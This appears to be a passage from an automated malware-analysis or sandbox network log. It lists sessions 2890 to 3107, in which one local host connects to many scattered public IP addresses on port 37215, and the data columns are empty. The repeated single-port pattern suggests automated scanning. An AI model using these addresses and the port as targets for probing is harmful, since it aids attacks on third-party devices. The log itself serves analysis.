                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2890192.168.2.1558892181.195.142.8137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2891192.168.2.154919694.47.174.18237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2892192.168.2.154485841.192.252.3637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2893192.168.2.1546964157.91.130.23837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2894192.168.2.1542236210.128.211.24737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2895192.168.2.1560062102.60.255.1737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2896192.168.2.1560056222.71.219.17637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2897192.168.2.1556830204.34.8.12837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2898192.168.2.1549558197.55.54.21337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2899192.168.2.1540600181.199.66.2737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2900192.168.2.1539856197.207.163.1937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2901192.168.2.1553354156.128.232.18637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2902192.168.2.1538982122.100.181.737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2903192.168.2.1540650181.136.12.7337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2904192.168.2.1553682186.20.125.4937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2905192.168.2.155012637.114.135.19237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2906192.168.2.1555482122.56.245.8537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2907192.168.2.1558436122.201.124.24337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2908192.168.2.1549070186.84.77.15537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2909192.168.2.153656694.206.9.17637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2910192.168.2.1539978121.189.232.6537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2911192.168.2.1540032121.213.142.24237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2912192.168.2.153907041.126.194.17237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2913192.168.2.1544040190.153.97.16937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2914192.168.2.155829445.245.219.17137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2915192.168.2.1560454190.17.231.23537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2916192.168.2.154626237.194.235.11637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2917192.168.2.1539586156.200.155.10437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2918192.168.2.1543512156.221.49.7237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2919192.168.2.1550658138.76.30.3437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2920192.168.2.1559750138.116.167.2937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2921192.168.2.1554226138.156.149.4837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2922192.168.2.153699241.144.227.13137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2923192.168.2.1550394122.101.116.18737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2924192.168.2.154409031.107.220.10937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2925192.168.2.1546986102.26.173.10637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2926192.168.2.1539838157.215.16.937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2927192.168.2.1538096157.177.57.2737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2928192.168.2.153933241.239.54.3837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2929192.168.2.154932241.141.179.22437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2930192.168.2.1552394121.49.16.19737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2931192.168.2.1557620102.177.211.4837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2932192.168.2.1550312138.47.233.6837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2933192.168.2.155761445.126.103.13137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2934192.168.2.1554858197.95.40.21037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2935192.168.2.1538376181.61.165.16637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2936192.168.2.155751631.140.232.25137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2937192.168.2.1534060122.31.112.4037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2938192.168.2.1556748156.152.12.8837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2939192.168.2.1540168121.112.7.10537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2940192.168.2.1544336181.108.236.9237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2941192.168.2.1538954122.44.61.24437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2942192.168.2.1538000179.197.25.10437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2943192.168.2.153424694.167.5.4337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2944192.168.2.1535148181.80.48.19937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2945192.168.2.1547870138.28.53.7037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2946192.168.2.1539366156.118.55.24237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2947192.168.2.153298645.68.108.16237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2948192.168.2.1547844121.7.159.21537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2949192.168.2.1548788197.163.62.13437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2950192.168.2.154057231.243.198.22237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2951192.168.2.1533810156.25.171.5137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2952192.168.2.1559792181.48.218.3637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2953192.168.2.1557772222.240.127.9037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2954192.168.2.155495420.187.15.13637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2955192.168.2.154033037.246.186.4137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2956192.168.2.153499494.28.118.24137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2957192.168.2.1554536181.6.123.19237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2958192.168.2.155094237.33.2.14037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2959192.168.2.1534862157.44.79.12837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2960192.168.2.1552268138.111.23.5737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2961192.168.2.153781231.58.168.5737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2962192.168.2.1541738157.45.2.6637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2963192.168.2.153458645.186.66.9337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2964192.168.2.1544592122.28.17.19137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2965192.168.2.1538780190.71.140.24737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2966192.168.2.1543038190.129.136.13137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2967192.168.2.154829694.158.208.23637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2968192.168.2.155890641.31.195.7137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2969192.168.2.1559216156.31.132.7337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2970192.168.2.1560172138.170.223.6837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2971192.168.2.1538150190.36.178.24737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2972192.168.2.1548324186.163.234.10537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2973192.168.2.153419045.172.13.5637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2974192.168.2.1555322181.226.23.22737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2975192.168.2.1547742121.184.182.8437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2976192.168.2.1554846138.52.17.16337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2977192.168.2.1534178181.57.153.11037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2978192.168.2.1546604156.11.167.25037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2979192.168.2.156063245.70.199.4937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2980192.168.2.1556900157.137.165.2037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2981192.168.2.153830645.88.45.23037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2982192.168.2.155605494.23.34.20537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2983192.168.2.154764641.196.18.19237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2984192.168.2.1558512186.64.232.4437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2985192.168.2.1537112121.143.212.4337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2986192.168.2.154490831.186.126.17237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2987192.168.2.155897094.170.106.7037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2988192.168.2.153940645.223.67.11237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2989192.168.2.155870441.63.162.5837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2990192.168.2.1543558186.217.248.6937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2991192.168.2.1553536121.182.205.17637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2992192.168.2.153400641.50.34.19237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2993192.168.2.155932637.40.178.8137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2994192.168.2.1552844122.117.96.24237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2995192.168.2.1558368186.85.143.14437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2996192.168.2.1560730138.167.178.4437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2997192.168.2.1533472122.170.64.18537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2998192.168.2.1544156197.162.18.17537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2999192.168.2.1538846121.57.233.17537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3000192.168.2.1534614102.107.238.12237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3001192.168.2.155821441.142.128.9837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3002192.168.2.1551860102.62.222.9137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3003192.168.2.1555112122.253.155.2337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3004192.168.2.1549080102.10.180.21637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3005192.168.2.1551306197.159.70.16437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3006192.168.2.155410037.230.130.20737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3007192.168.2.1549168157.111.64.12837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3008192.168.2.155092845.70.104.25037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3009192.168.2.155791474.42.175.20637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3010192.168.2.1554182138.37.21.4437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3011192.168.2.1535734157.149.205.16337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3012192.168.2.1557082197.117.187.20437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3013192.168.2.1556820222.1.226.8537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3014192.168.2.1533206138.119.15.437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3015192.168.2.1533812138.74.230.13337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3016192.168.2.1544386102.206.68.12937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3017192.168.2.1540114121.199.84.20337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3018192.168.2.153377841.55.200.22137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3019192.168.2.1559638182.110.181.21537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3020192.168.2.155178441.153.245.7637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3021192.168.2.1544354102.32.41.3937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3022192.168.2.1552084182.188.217.5737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3023192.168.2.155483241.113.26.18137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3024192.168.2.1550292156.221.9.5437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3025192.168.2.153563645.222.165.10237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3026192.168.2.154558694.154.65.8037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3027192.168.2.1541290122.220.192.25537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3028192.168.2.155993031.67.249.14437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3029192.168.2.1542842122.153.121.237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3030192.168.2.1556612138.168.251.15837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3031192.168.2.1545708121.38.194.15137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3032192.168.2.1550942157.228.244.4337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3033192.168.2.1559796157.103.158.20137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3034192.168.2.1533560222.128.228.6237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3035192.168.2.1545978197.217.89.18037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3036192.168.2.1560260186.46.147.23537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3037192.168.2.1533964102.78.175.13837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3038192.168.2.155029841.18.33.11337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3039192.168.2.153689241.221.39.19837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3040192.168.2.153975845.78.153.8837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3041192.168.2.1554982102.4.140.14437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3042192.168.2.153707241.163.46.12437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3043192.168.2.155275431.45.101.19637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3044192.168.2.1541412122.61.130.15737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3045192.168.2.1558516197.16.151.24337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3046192.168.2.1552658222.149.131.18637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3047192.168.2.1544788186.245.221.7937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3048192.168.2.1537296102.137.161.9437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3049192.168.2.1552798222.117.56.7037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3050192.168.2.154201041.6.121.12137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3051192.168.2.1554346121.55.168.11037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3052192.168.2.153378837.253.217.1937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3053192.168.2.1543648121.5.104.5337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3054192.168.2.1542198102.163.77.337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3055192.168.2.156065694.56.193.3237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3056192.168.2.154304894.91.222.11937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3057192.168.2.1534676181.121.120.1837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3058192.168.2.1554884222.103.40.12037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3059192.168.2.155093437.192.153.10737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3060192.168.2.1534626197.197.214.15237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3061192.168.2.1541970111.71.83.17837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3062192.168.2.1553516121.38.197.8637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3063192.168.2.1533054181.73.97.19337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3064192.168.2.1557116186.244.200.9937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3065192.168.2.155684437.155.12.3937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3066192.168.2.1550234157.195.67.8337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3067192.168.2.1539854134.255.239.12937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3068192.168.2.1533458156.153.35.12437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3069192.168.2.155109437.196.77.20937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3070192.168.2.1541600102.110.192.20137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3071192.168.2.155431841.151.148.8437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3072192.168.2.154235231.145.30.22637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3073192.168.2.1551172102.4.85.9037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3074192.168.2.155033241.141.208.10237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3075192.168.2.153905041.219.57.3737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3076192.168.2.155952841.235.91.16437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3077192.168.2.1559962121.61.97.18437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3078192.168.2.1542922222.107.156.8037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3079192.168.2.1559328186.130.174.24937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3080192.168.2.1553772138.142.200.1037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3081192.168.2.1536980102.228.104.21137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3082192.168.2.1560914197.90.32.5937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3083192.168.2.1541844157.53.73.4037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3084192.168.2.154351694.24.109.4037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3085192.168.2.1555932222.180.145.3137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3086192.168.2.153308641.221.102.12437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3087192.168.2.155339641.70.10.23437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3088192.168.2.1560756157.216.61.18137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3089192.168.2.1549246157.47.171.5337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3090192.168.2.1547366190.218.64.24937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3091192.168.2.1542256156.253.236.1837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3092192.168.2.1552770102.20.122.4537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3093192.168.2.154400031.206.112.18137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3094192.168.2.1560184197.149.76.8137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3095192.168.2.155004045.97.255.14537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3096192.168.2.155713237.179.174.21137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3097192.168.2.1554992102.125.244.11537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3098192.168.2.1552196197.114.176.15037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3099192.168.2.155479294.237.95.7037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3100192.168.2.155083241.18.225.2137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3101192.168.2.1551570222.183.172.17937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3102192.168.2.154789041.167.192.25337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3103192.168.2.1553036122.76.225.5637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3104192.168.2.1547806102.155.209.19937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3105192.168.2.1554054181.54.198.10537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3106192.168.2.1554352157.141.208.16337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3107192.168.2.1544576121.82.170.16237215
                                              TimestampBytes transferredDirectionData


